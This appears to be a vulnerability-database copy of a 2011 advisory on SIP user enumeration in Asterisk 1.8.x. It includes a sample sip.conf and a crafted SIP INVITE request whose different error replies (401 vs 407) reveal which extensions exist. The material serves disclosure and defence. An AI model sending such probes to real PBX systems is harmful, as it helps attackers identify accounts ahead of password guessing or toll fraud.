Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Asterisk 1.8.x SIP User Enumeration

🗓️ 01 May 2011 00:00:00Reported by Francesco TornieriType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

Asterisk 1.8.x SIP User Enumeration, Sip responses permit user identification through INVITE metho

Code
`Asterisk, sip response permit username identification through use INVITE   
  
Author: francesco.tornieri \"At\" verona-wireless.net   
Summary: Sip responses permit user identification  
Release Date: 01/05/2011  
Criticality level: Low  
Impact: Information leak  
Software: Asterisk 1.8.x (tested 1.8.3.2)  
  
Description:  
It's possible to enumerate valide sip username through use INVITE request method instead of REGISTER method (a similar problem has been fixed by Digium in 2009 and has been described in this document http://downloads.asterisk.org/pub/security/AST-2009-003.html)  
  
Example:  
PBX Asterisk:  
----------  
sip.conf  
----------  
[general]  
context=outgoing  
port=5060  
bindaddr=192.168.2.1  
realm=asterisk  
allowguest=no   
alwaysauthreject=yes <----  
  
[template](!)  
type=friend  
canreinvite=no  
host=dynamic  
qualify=1000  
disallow=all  
allow=g729  
  
[100](template)  
callerid=phone100<100>  
username=100  
secret=password  
  
[500](template)  
callerid=phone200<500>  
username=500  
secret=password  
  
------------------------  
Craft Sip INVITE example  
------------------------  
INVITE sip:192.168.2.1 SIP/2.0  
CSeq: 3 INVITE  
Via: SIP/2.0/UDP localhost:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport  
User-Agent: TT  
From: <sip:[email protected]>;tag=642d29cd-0671-e011-81a1-a1816009ca7a  
Call-ID: 5RRdd5Cv-0771-e011-84a1-a1816009ca7a@lapblack2  
To: <sip:[email protected]>  
Contact: <sip:105@localhost>;q=1  
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING  
Expires: 3600  
Content-Length: 0  
Max-Forwards: 70  
  
----------------  
Method: INVITE   
----------------  
Valid user (user 100)  
Response:   
---  
Received: SIP/2.0 401 Unauthorized  
---  
  
Invalid user (user 1008)  
Response:  
---  
Received: SIP/2.0 407 Proxy Authentication Required  
---  
  
Francesco Tornieri  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 May 2011 00:00Current
7.4High risk
Vulners AI Score7.4
asterisk 1.8.xsip user enumerationsip responseusername identificationinvite methodinformation leak
28